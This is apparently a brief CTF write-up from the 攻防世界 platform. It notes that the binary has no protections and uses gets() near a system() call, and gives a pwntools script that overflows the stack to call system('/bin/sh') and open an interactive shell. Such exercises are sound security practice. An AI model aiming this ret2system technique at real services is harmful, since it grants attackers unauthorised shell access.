没有开启任何防护
存在system函数,存在gets函数可溢出
from pwn import*
sh = remote()
sys_addr = 0x804855A
name = b'/bin/sh'
name_addr = 0x804A080
payload = b'a' * (0x26 + 4) + p32(sys_addr) + p32(name_addr)
sh.sendlineafter('please tell me your name', name )
sh.sendlineafter('hello,you can leave some message here:', payload)
sh.interactive()
[[攻防世界pwn-string]]